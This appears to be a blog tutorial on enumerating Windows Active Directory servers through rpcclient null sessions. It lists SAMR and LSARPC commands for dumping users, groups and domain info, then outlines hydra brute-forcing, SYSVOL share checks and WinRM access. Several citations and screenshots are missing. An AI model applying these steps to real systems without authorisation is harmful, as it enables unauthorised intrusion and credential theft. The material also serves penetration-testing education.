“Human Stupidity, that’s why Hackers always win.”
― Med Amine Khelifi

Hacking in 5 minutes with Remote Procedure Call and Active Directory enumeration

Before we start going deeper,let me introduce you what is RPC(Remote Procedure call)?, based on Microsoft documentation:


Moment I encounter window server machine that available RPC service, I try to fully utilize the enumeration of service by using rpcclient.

what is rpcclient? it is tool for executing client side MS-RPC functions.

rpcclient [-A authfile] [-c <command string>] [-d debuglevel] [-l logdir] [-N] [-s <smb config file>] [-U username[%password]] [-W workgroup] [-I destinationIP] {server}

rpcclient support many command options to execute MS-RPC function,these command can be placed under several categories,LSARPC,LSARPC-DS,REG,SRVSVC,SAMR,SPOOLSS,NETLOGON,FSRVP

LSARPC is really a set of calls, transmitted with RPC, to a system called the “Local Security Authority”. This used in the Microsoft/Windows world to perform management tasks on domain security policies from a remote machine. The protocol is described in . The transport medium is RPC, a part of the “Server Message Block” protocol (, ).()

List of LSARPC Command.

For example, If you allowed to login using “Null” , you can query for domain info by command “querydominfo”.

enumprivs will return permission.

LSARPC-DS is use to get primary domain information.

REG is used to “shutdown” and “Abort Shutdown” , you can shutdown the machine if you are privileges user.

SRVSVC , which remotely enables file and printer sharing and named pipe access to the server through the Server Message Block Protocol. If you wonder what famous exploit for window XP and Window2003 back then (67) , It come from this access.

With “Null” access, I don’t have permission to list.Sometimes,you might find misconfigurations that may expose juicy information.

SAMR is Security Account Manager (SAM) Remote Protocol (Client-to-Server) provides management functionality for an account store or directory containing users and groups.

login with “Null” permission.
querydispinfo, will show full information on targeted machine. Sometimes, you may obtain sensitive information on description.
enumdomusers,return list of users from target machine.
return password information if it possible to be brute-force.
enumdomains,give idea about domain on targeted machine.
enumdomgroups, enable what permission that user has.

SPOOLSS is Microsoft Print System Remote Protocol. For this part there is not much explanation from me, but you can explore for bigger idea about SPOOLSS pipe. you also can refer here, ()

Netlogon is a Windows Server process that authenticates users and other services within a domain. Since it is a service and not an application, Netlogon continuously runs in the background, unless it is stopped manually or by a runtime error.

FSRVP, Specifies the File Server Remote VSS Protocol, an RPC-based protocol used for creating shadow copies of file shares on a remote computer, and for facilitating backup applications in performing application-consistent backup and restore of data on SMB2 shares.

Once you have enough information,now attacking time!!

brute-force information that I have gather with hydra.
enumeration for sharename.
checking for sharing files with SYSVOL sharename.

remote access using window remote management permission.

checking user security ID and permission.

That’s all from me, I hope it worth for you to learn about RPC protocol and abuse it security.Don’t forget to follow me and become earliest member of huntr to get free hoodie. Kindly to explore my previous articles. bye!

Security consultant and researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store